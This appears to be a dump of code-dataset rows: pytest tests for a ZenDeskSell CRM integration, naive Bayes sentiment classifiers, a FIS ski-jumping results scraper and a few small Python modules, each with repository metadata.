"resource_type": "deal",
"resource_id": resource_id,
"content": "\n".join(
[
"Live Notes",
"service_name just requested to go live.",
"",
"- Department/org: department_org_name",
"- Intended recipients: intended_recipients",
"- Purpose: main_use_case",
"- Notification types: notification_types",
"- Expected monthly volume: expected_volume",
"---",
"service_url",
]
),
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
expected_note_id = "1"
resp_data = {"data": {"id": expected_note_id}}
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/notes",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(resp_data),
)
data: Dict[str, Any] = {
"email_address": "test@email.com",
"service_name": "service_name",
"department_org_name": "department_org_name",
"intended_recipients": "intended_recipients",
"main_use_case": "main_use_case",
"notification_types": "notification_types",
"expected_volume": "expected_volume",
"service_url": "service_url",
"support_type": "go_live_request",
}
with notify_api.app_context():
note_id = ZenDeskSell().create_note(ZenDeskSell.NoteResourceType.DEAL, resource_id, ContactRequest(**data))
assert expected_note_id == note_id
@pytest.mark.parametrize(
"expected_resp_data",
[
{"blank": "blank"},
{"data": {"blank": "blank"}},
],
)
def test_create_note_invalid_response(
notify_api: Flask,
sample_service: Service,
expected_resp_data: Dict[str, Dict[str, Union[int, str]]],
):
with requests_mock.mock() as rmock:
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/notes",
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps(expected_resp_data),
)
data: Dict[str, Any] = {
"email_address": "test@email.com",
"service_name": "service_name",
"department_org_name": "department_org_name",
"intended_recipients": "intended_recipients",
"main_use_case": "main_use_case",
"notification_types": "notification_types",
"expected_volume": "expected_volume",
"service_url": "service_url",
"support_type": "go_live_request",
}
with notify_api.app_context():
note_id = ZenDeskSell().create_note(ZenDeskSell.NoteResourceType.DEAL, "1", ContactRequest(**data))
assert not note_id
@pytest.mark.parametrize("is_go_live,existing_contact_id", [(False, None), (False, "1"), (True, None)])
def test_create_service_or_go_live_contact_fail(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
is_go_live: bool,
existing_contact_id: Optional[str],
):
upsert_contact_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_contact", return_value=(None, False))
convert_lead_to_contact_mock = mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
with notify_api.app_context():
if is_go_live:
assert not ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], existing_contact_id)
else:
assert not ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
convert_lead_to_contact_mock.assert_called_once_with(sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], existing_contact_id)
@pytest.mark.parametrize("is_go_live,existing_contact_id", [(False, None), (False, "2"), (True, None)])
def test_create_service_or_go_live_deal_fail(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
is_go_live: bool,
existing_contact_id: Optional[str],
):
with requests_mock.mock() as rmock:
contact_id = existing_contact_id or "1"
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps({"data": {"id": contact_id, "created_at": "1", "updated_at": "1"}}),
)
mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=None)
mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
contact_delete_mock = mocker.patch("app.user.rest.ZenDeskSell.delete_contact")
with notify_api.app_context():
if is_go_live:
assert not ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
else:
assert not ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
contact_delete_mock.assert_called_once_with(contact_id)
@pytest.mark.parametrize("is_go_live,existing_contact_id", [(False, None), (False, "1"), (True, None)])
def test_create_service_or_go_live_deal_fail_contact_exists(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
is_go_live: bool,
existing_contact_id: Optional[str],
):
with requests_mock.mock() as rmock:
contact_id = existing_contact_id or "1"
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps({"data": {"id": contact_id, "created_at": "1", "updated_at": "2"}}),
)
mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=None)
mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
contact_delete_mock = mocker.patch("app.user.rest.ZenDeskSell.delete_contact")
with notify_api.app_context():
if is_go_live:
assert not ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
else:
assert not ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
contact_delete_mock.assert_not_called()
@pytest.mark.parametrize("existing_contact_id", [None, "2"])
def test_send_create_service(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
existing_contact_id: Optional[str],
):
contact_id = existing_contact_id or "1"
upsert_contact_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_contact", return_value=(contact_id, True))
convert_lead_to_contact_mock = mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
upsert_deal_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=1)
with notify_api.app_context():
assert ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
convert_lead_to_contact_mock.assert_called_once_with(sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], existing_contact_id)
upsert_deal_mock.assert_called_once_with(contact_id, sample_service, ZenDeskSell.STATUS_CREATE_TRIAL)
def test_send_go_live_request(notify_api: Flask, sample_service: Service, mocker: MockFixture):
deal_id = "1"
search_deal_id_mock = mocker.patch("app.user.rest.ZenDeskSell.search_deal_id", return_value=deal_id)
send_create_service_mock = mocker.patch("app.user.rest.ZenDeskSell.send_create_service", return_value="1")
create_note_mock = mocker.patch("app.user.rest.ZenDeskSell.create_note", return_value="2")
data: Dict[str, Any] = {
"email_address": "test@email.com",
"service_name": "service_name",
"department_org_name": "department_org_name",
"intended_recipients": "intended_recipients",
"main_use_case": "main_use_case",
"notification_types": "notification_types",
"expected_volume": "expected_volume",
"service_url": "service_url",
"support_type": "go_live_request",
}
contact = ContactRequest(**data)
with notify_api.app_context():
assert ZenDeskSell().send_go_live_request(sample_service, sample_service.users[0], contact)
search_deal_id_mock.assert_called_once_with(sample_service)
send_create_service_mock.assert_not_called()
create_note_mock.assert_called_once_with(ZenDeskSell.NoteResourceType.DEAL, deal_id, contact)
def test_send_go_live_request_search_failed(notify_api: Flask, sample_service: Service, mocker: MockFixture):
deal_id = "1"
search_deal_id_mock = mocker.patch("app.user.rest.ZenDeskSell.search_deal_id", return_value=None)
send_create_service_mock = mocker.patch("app.user.rest.ZenDeskSell.send_create_service", return_value=deal_id)
create_note_mock = mocker.patch("app.user.rest.ZenDeskSell.create_note", return_value="1")
data: Dict[str, Any] = {
"email_address": "test@email.com",
"service_name": "service_name",
"department_org_name": "department_org_name",
"intended_recipients": "intended_recipients",
"main_use_case": "main_use_case",
"notification_types": "notification_types",
"expected_volume": "expected_volume",
"service_url": "service_url",
"support_type": "go_live_request",
}
contact = ContactRequest(**data)
with notify_api.app_context():
assert ZenDeskSell().send_go_live_request(sample_service, sample_service.users[0], contact)
search_deal_id_mock.assert_called_once_with(sample_service)
send_create_service_mock.assert_called_once_with(sample_service, sample_service.users[0])
create_note_mock.assert_called_once_with(ZenDeskSell.NoteResourceType.DEAL, deal_id, contact)
def test_send_go_live_service(notify_api: Flask, sample_service: Service, mocker: MockFixture):
contact_id = 1
upsert_contact_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_contact", return_value=(contact_id, True))
upsert_deal_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=1)
with notify_api.app_context():
assert ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], None)
upsert_deal_mock.assert_called_once_with(contact_id, sample_service, ZenDeskSell.STATUS_CLOSE_LIVE)
| 39.230016 | 126 | 0.631113 | 2,755 | 24,048 | 5.180036 | 0.073321 | 0.046668 | 0.045267 | 0.033284 | 0.872399 | 0.84507 | 0.816131 | 0.797001 | 0.769883 | 0.746058 | 0 | 0.026641 | 0.24921 | 24,048 | 612 | 127 | 39.294118 | 0.763777 | 0.005489 | 0 | 0.632692 | 0 | 0.003846 | 0.22791 | 0.052524 | 0 | 0 | 0 | 0 | 0.073077 | 1 | 0.053846 | false | 0 | 0.017308 | 0.003846 | 0.092308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b2cc68b36f74374f809c38b4a5341aa5d5152a70 | 6,193 | py | Python | HWs/CS464-Spring19-HWs/HW-1/code/tester.py | metehkaya/Bilkent-BSc-CS-Projects-and-HWs | bbc04b5207cf0b091d48cc2c26dfc75d6174505a | [
"MIT"
] | null | null | null | HWs/CS464-Spring19-HWs/HW-1/code/tester.py | metehkaya/Bilkent-BSc-CS-Projects-and-HWs | bbc04b5207cf0b091d48cc2c26dfc75d6174505a | [
"MIT"
] | null | null | null | HWs/CS464-Spring19-HWs/HW-1/code/tester.py | metehkaya/Bilkent-BSc-CS-Projects-and-HWs | bbc04b5207cf0b091d48cc2c26dfc75d6174505a | [
"MIT"
] | null | null | null | import math
def multinomial_naive_bayes(train_pis, test_features_matrix, train_theta_t):
n_tweet = len(test_features_matrix)
n_feature = len(test_features_matrix[0])
test_result = []
for tweet in range(n_tweet):
score = [0, 0, 0]
for k in range(3):
score[k] = math.log(train_pis[k])
for feature in range(n_feature):
theta = train_theta_t[feature][k]
test_feature = test_features_matrix[tweet][feature]
if theta == 0:
if test_feature == 0:
score[k] += 0
else:
score[k] += -math.inf
else:
score[k] += test_feature * math.log(theta)
best_label = -1
best_score = -1
for k in range(3):
if score[k] > best_score or best_label == -1:
best_score = score[k]
best_label = k
if math.fabs(score[1] - score[2]) < 0.000001:
best_label = 0
if best_label == 0:
test_result.append('neutral')
elif best_label == 1:
test_result.append('positive')
elif best_label == 2:
test_result.append('negative')
return test_result
'''
def naive_bayes(train_pis, test_features_matrix, train_theta_t):
n_tweet = len(test_features_matrix)
n_feature = len(test_features_matrix[0])
test_result = []
for tweet in range(n_tweet):
score = [0, 0, 0]
minf = [0, 0, 0]
for k in range(3):
score[k] = math.log(train_pis[k])
for feature in range(n_feature):
theta = train_theta_t[feature][k]
test_feature = test_features_matrix[tweet][feature]
if theta == 0:
if test_feature == 0:
score[k] += 0
else:
minf[k] += 1
else:
score[k] += test_feature * math.log(theta)
best_label = -1
best_score = -1
best_minf = n_feature + 5
for k in range(3):
if best_label == -1 or (minf[k] < best_minf) or (minf[k] == best_minf and score[k] > best_score):
best_minf = minf[k]
best_score = score[k]
best_label = k
if minf[1] == minf[2] and math.fabs(score[1] - score[2]) < 0.000001:
best_label = 0
if best_label == 0:
test_result.append('neutral')
elif best_label == 1:
test_result.append('positive')
elif best_label == 2:
test_result.append('negative')
return test_result
'''
def bernoulli_naive_bayes(train_pis, test_features_matrix, train_theta_s):
n_tweet = len(test_features_matrix)
n_feature = len(test_features_matrix[0])
test_result = []
for tweet in range(n_tweet):
score = [0, 0, 0]
for k in range(3):
score[k] = math.log(train_pis[k])
for feature in range(n_feature):
theta = train_theta_s[feature][k]
test_feature = min(test_features_matrix[tweet][feature], 1)
value = test_feature * theta + (1-test_feature) * (1-theta)
if value == 0:
score[k] += -math.inf
else:
score[k] += math.log(value)
best_label = -1
best_score = -1
for k in range(3):
if best_label == -1 or score[k] > best_score:
best_score = score[k]
best_label = k
if math.fabs(score[1] - score[2]) < 0.000001:
best_label = 0
if best_label == 0:
test_result.append('neutral')
elif best_label == 1:
test_result.append('positive')
elif best_label == 2:
test_result.append('negative')
return test_result
'''
def bernoulli_naive_bayes(train_pis, test_features_matrix, train_theta_s):
n_tweet = len(test_features_matrix)
n_feature = len(test_features_matrix[0])
test_result = []
for tweet in range(n_tweet):
score = [0, 0, 0]
score_log = [0, 0, 0]
minf = [0, 0, 0]
for k in range(3):
score[k] = math.log(train_pis[k])
for feature in range(n_feature):
theta = train_theta_s[feature][k]
test_feature = min(test_features_matrix[tweet][feature], 1)
value = test_feature * theta + (1-test_feature) * (1-theta)
if value == 0:
minf[k] += 1
else:
score_log[k] += math.log(value)
score[k] += score_log[k]
best_label = -1
best_score = -1
best_minf = n_feature + 5
for k in range(3):
if best_label == -1 or (minf[k] < best_minf) or (minf[k] == best_minf and score[k] > best_score):
best_minf = minf[k]
best_score = score[k]
best_label = k
if minf[1] == minf[2] and math.fabs(score[1] - score[2]) < 0.000001:
best_label = 0
if best_label == 0:
test_result.append('neutral')
elif best_label == 1:
test_result.append('positive')
elif best_label == 2:
test_result.append('negative')
return test_result
'''
def get_class_id(label):
if label == 'neutral':
return 0
elif label == 'positive':
return 1
elif label == 'negative':
return 2
return -1
def find_accuracy(test_result, test_labels):
correct = 0
failure = 0
counter = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
n_tweet = len(test_result)
for tweet in range(n_tweet):
prediction = get_class_id(test_result[tweet])
actual = get_class_id(test_labels[tweet])
counter[prediction][actual] += 1
if test_result[tweet] == test_labels[tweet]:
correct += 1
else:
failure += 1
print('correct: ', correct)
print('failure: ', failure)
print('accuracy: ', float(correct) / (correct + failure))
print('counter: ', counter)
| 34.597765 | 109 | 0.52527 | 795 | 6,193 | 3.865409 | 0.077987 | 0.082005 | 0.093719 | 0.05467 | 0.841198 | 0.826228 | 0.826228 | 0.814514 | 0.801497 | 0.801497 | 0 | 0.034666 | 0.36186 | 6,193 | 178 | 110 | 34.792135 | 0.742915 | 0 | 0 | 0.566667 | 0 | 0 | 0.032073 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.011111 | 0 | 0.122222 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b2e3b07bcfb8632ecae6a12475b580ccf0420bd0 | 144 | py | Python | transcription_compare/tokenizer/__init__.py | HannaHUp/transcription-compare | e25d9651e604a854acba9659602ae1ea5497169e | [
"MIT"
] | 2 | 2019-09-03T13:26:55.000Z | 2020-08-04T20:32:35.000Z | transcription_compare/tokenizer/__init__.py | HannaHUp/transcription-compare | e25d9651e604a854acba9659602ae1ea5497169e | [
"MIT"
] | null | null | null | transcription_compare/tokenizer/__init__.py | HannaHUp/transcription-compare | e25d9651e604a854acba9659602ae1ea5497169e | [
"MIT"
] | null | null | null | from .abstract_tokenizer import AbstractTokenizer
from .character_tokenizer import CharacterTokenizer
from .word_tokenizer import WordTokenizer
| 36 | 51 | 0.895833 | 15 | 144 | 8.4 | 0.6 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 144 | 3 | 52 | 48 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
654a721337574b3ca73fe38985f4aa469a26af02 | 8,981 | py | Python | UstvarjanjeSQL/UstvarjanjeSQL rezultatov.py | MartinDolenc/Skoki | 23877d02d8fbbd80defbb6276adfe636a543530a | [
"MIT"
] | null | null | null | UstvarjanjeSQL/UstvarjanjeSQL rezultatov.py | MartinDolenc/Skoki | 23877d02d8fbbd80defbb6276adfe636a543530a | [
"MIT"
] | null | null | null | UstvarjanjeSQL/UstvarjanjeSQL rezultatov.py | MartinDolenc/Skoki | 23877d02d8fbbd80defbb6276adfe636a543530a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Uvozimo potrebne knjižnice
from lxml import html
import requests
import csv
import re
import pandas as pd
import sqlalchemy
import sqlite3
import itertools
def text(tag):
parts = [tag.text] + [text(t) for t in tag] + [tag.tail]
if tag.tag == 'br':
parts.insert(0, ' ')
return re.sub(r'\s+', ' ', ''.join(filter(None, parts)))
# za posamezne tekme
link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=2832"
stran = html.fromstring(requests.get(link).content)
if len([text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs pale']")]) > 2:
ranki = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right pr-1 gray bold']")]
startnaStevilka = [text(r).replace('*', '').strip() for r in
stran.xpath(
"//div[@class='g-lg-1 g-md-1 g-sm-1 justify-right hidden-xs pr-1 gray']")]
fisCode = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 hidden-xs justify-right gray pr-1']")]
drzava = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@id='events-info-results']//span[@class='country__name-short']")]
skokiInRezultati = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
skoki = skokiInRezultati[0:][::2]
rezultati = skokiInRezultati[1:][::2]
# skoki = skoki[:len(drzava)]
# rezultati = rezultati[:len(drzava)]
ranki = ranki[:len(drzava)]
fisCode = fisCode[:len(drzava)]
startnaStevilka = startnaStevilka[:len(drzava)]
ranki = list(itertools.chain(*zip(ranki, ranki)))
startnaStevilka = list(itertools.chain(*zip(startnaStevilka, startnaStevilka)))
fisCode = list(itertools.chain(*zip(fisCode, fisCode)))
serija = list(itertools.chain(*zip(['1'] * (len(ranki) // 2), ['2'] * (len(ranki) // 2))))
mesto_v_ekipi = [''] * len(serija)
drzava = list(itertools.chain(*zip(drzava, drzava)))
skoki = skoki[:len(drzava)]
rezultati = rezultati[:len(drzava)]
else:
ranki = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right pr-1 gray bold']")]
startnaStevilka = [text(r).replace('*', '').strip() for r in
stran.xpath(
"//div[@class='g-lg-1 g-md-1 g-sm-1 justify-right hidden-xs pr-1 gray']")]
fisCode = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 hidden-xs justify-right gray pr-1']")]
drzava = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@id='events-info-results']//span[@class='country__name-short']")]
skokiInRezultati = [text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
skoki = skokiInRezultati[0:][::2]
rezultati = skokiInRezultati[1:][::2]
skoki = skoki[:len(drzava)]
rezultati = rezultati[:len(drzava)]
ranki = ranki[:len(drzava)]
fisCode = fisCode[:len(drzava)]
startnaStevilka = startnaStevilka[:len(drzava)]
serija = ['1'] * len(ranki)
mesto_v_ekipi = [''] * len(serija)
if (len(skoki) != 0) or (len(rezultati) != 0):
print('različno od 0')
else:
print('enako 0')
serija = ['3'] * len(ranki)
rez = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-3 g-xs-5 justify-right blue bold ']")]
rezultati = rez[:len(serija)]
skoki = [''] * len(serija)
print(ranki)
print(startnaStevilka)
print(fisCode)
print(drzava)
print(skoki)
print(rezultati)
print(serija)
print(mesto_v_ekipi)
print([len(ranki), len(startnaStevilka), len(fisCode), len(drzava), len(skoki), len(rezultati), len(serija), len(mesto_v_ekipi)])
'''
# za ekipno
link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=5276"
stran = html.fromstring(requests.get(link).content)
if len([text(r).replace('*', '').strip() for r in
stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs text-right pale']")]) > 2:
ranki = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right bold pr-1']")]
fisCode = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-3 hidden-xs justify-right gray pr-1']")]
drzava1 = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_main']")]
skokiInRezultati = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_additional']//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
ranki = list(itertools.chain(*zip(ranki,ranki)))
ranki = list(itertools.chain(*zip(ranki,ranki)))
ranki = list(itertools.chain(*zip(ranki,ranki)))
print(len(skokiInRezultati))
skoki = skokiInRezultati[0:][::2]
rezultati = skokiInRezultati[1:][::2]
fisCodeReal = []
for str in fisCode:
if len(str) == 4:
fisCodeReal.append(str)
fisCodeReal = list(itertools.chain(*zip(fisCodeReal,fisCodeReal)))
serija = list(itertools.chain(*zip(['1']*(len(ranki)//2),['2']*(len(ranki)//2))))
mesto_v_ekipi = ['1', '2', '3', '4']*(len(ranki)//8)
mesto_v_ekipi = list(itertools.chain(*zip(mesto_v_ekipi,mesto_v_ekipi)))
#rezultati = list(filter(None, rezultati))
#skoki = list(filter(None, skoki))
startnaStevilka = ['']*len(ranki)
drzava = []
for str in drzava1:
drzava.append(str.split()[-2])
drzava = list(itertools.chain(*zip(drzava,drzava)))
drzava = list(itertools.chain(*zip(drzava,drzava)))
drzava = list(itertools.chain(*zip(drzava,drzava)))
fisCode = fisCodeReal
else:
ranki = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right bold pr-1']")]
fisCode = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-3 hidden-xs justify-right gray pr-1']")]
drzava1 = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_main']")]
skokiInRezultati = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_additional']//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
ranki = list(itertools.chain(*zip(ranki, ranki)))
ranki = list(itertools.chain(*zip(ranki, ranki)))
print(len(skokiInRezultati))
skoki = skokiInRezultati[0:][::2]
rezultati = skokiInRezultati[1:][::2]
fisCodeReal = []
for str in fisCode:
if len(str) == 4:
fisCodeReal.append(str)
serija = ['1'] * len(ranki)
mesto_v_ekipi = ['1', '2', '3', '4'] * (len(ranki) // 4)
# rezultati = list(filter(None, rezultati))
# skoki = list(filter(None, skoki))
startnaStevilka = [''] * len(ranki)
drzava = []
for str in drzava1:
drzava.append(str.split()[-2])
drzava = list(itertools.chain(*zip(drzava, drzava)))
drzava = list(itertools.chain(*zip(drzava, drzava)))
fisCode = fisCodeReal
print(ranki)
print(startnaStevilka)
print(fisCode)
print(drzava)
print(skoki)
print(rezultati)
print(serija)
print(mesto_v_ekipi)
print([len(ranki), len(startnaStevilka), len(fisCode), len(drzava), len(skoki), len(rezultati), len(serija), len(mesto_v_ekipi)])
#link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=4862"
#stran = html.fromstring(requests.get(link).content)
#print(len([text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs pale']")]))
#link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=4861"
#stran = html.fromstring(requests.get(link).content)
#print('Team' in [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs pale']")][0])
# Naslov, od koder pobiramo podatke
#link = "https://www.fis-ski.com/DB/ski-jumping/biographies.html?lastname=&firstname=§orcode=JP&gendercode=M&birthyear=&skiclub=&skis=&nationcode=&fiscode=&status=&search=true&limit=1000&offset=5000"
#stran = html.fromstring(requests.get(link).content)
#drzava = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='table__body']")[0]
# .xpath("//span[@class='country__name-short']")]
'''
| 38.711207 | 204 | 0.603719 | 1,277 | 8,981 | 4.216132 | 0.117463 | 0.009658 | 0.053492 | 0.07578 | 0.845097 | 0.83711 | 0.83711 | 0.803678 | 0.778046 | 0.771545 | 0 | 0.020882 | 0.189511 | 8,981 | 231 | 205 | 38.878788 | 0.71878 | 0.014586 | 0 | 0.506329 | 0 | 0.139241 | 0.238264 | 0.034509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012658 | false | 0 | 0.101266 | 0 | 0.126582 | 0.139241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3334b3ed93786359ecb56e59674d5ac4b3092a9b | 158 | py | Python | eds/openmtc-gevent/server/openmtc-ngsi/openmtc-ngsi-pylibs/flask/testsuite/test_apps/moduleapp/apps/frontend/__init__.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/server/openmtc-ngsi/openmtc-ngsi-pylibs/flask/testsuite/test_apps/moduleapp/apps/frontend/__init__.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/server/openmtc-ngsi/openmtc-ngsi-pylibs/flask/testsuite/test_apps/moduleapp/apps/frontend/__init__.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | from flask import Module, render_template
frontend = Module(__name__)
@frontend.route('/')
def index():
return render_template('FrontEnd/motor.html')
| 15.8 | 49 | 0.740506 | 19 | 158 | 5.842105 | 0.736842 | 0.252252 | 0.396396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132911 | 158 | 9 | 50 | 17.555556 | 0.810219 | 0 | 0 | 0 | 0 | 0 | 0.126582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
686fc4e18637b31019062d7f770fcfac86f4e090 | 24 | py | Python | wendigo/application/__init__.py | medmsyk/wendigopy | 36e0759bf8b065548fd638063768522704506236 | [
"Apache-2.0"
] | null | null | null | wendigo/application/__init__.py | medmsyk/wendigopy | 36e0759bf8b065548fd638063768522704506236 | [
"Apache-2.0"
] | 1 | 2022-01-05T10:28:49.000Z | 2022-03-20T09:17:04.000Z | wendigo/application/__init__.py | medmsyk/wendigopy | 36e0759bf8b065548fd638063768522704506236 | [
"Apache-2.0"
] | null | null | null | from .dll import Wendigo | 24 | 24 | 0.833333 | 4 | 24 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6895684e92084ac85c5d46c4b6ddedc1bfa8cad4 | 60 | py | Python | theory/slides-2-0/topic-2-interactive-programs/python/integers.py | dgrafov/redi-python-intro | bbb29e58cd75602b720be5f7695fa4a66db521dd | [
"MIT"
] | 8 | 2018-01-30T10:40:32.000Z | 2018-09-08T21:08:03.000Z | theory/slides-2-0/topic-2-interactive-programs/python/integers.py | dgrafov/redi-python-intro | bbb29e58cd75602b720be5f7695fa4a66db521dd | [
"MIT"
] | null | null | null | theory/slides-2-0/topic-2-interactive-programs/python/integers.py | dgrafov/redi-python-intro | bbb29e58cd75602b720be5f7695fa4a66db521dd | [
"MIT"
] | 5 | 2018-02-08T18:02:34.000Z | 2019-10-05T17:51:23.000Z | num = 3
print(num, type(num))
Num = -5
